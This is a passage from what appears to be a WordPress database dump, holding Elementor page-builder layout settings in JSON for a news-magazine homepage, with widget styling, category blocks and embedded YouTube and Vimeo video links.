n_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1406,488,'_elementor_version','0.4'),(1407,488,'_elementor_css','a:3:{s:4:\"time\";i:1508919742;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1409,360,'_oembed_6a6f6dd05214efc3963efb0d318a45b5','{{unknown}}'),(1410,489,'_elementor_edit_mode','builder'),(1411,489,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"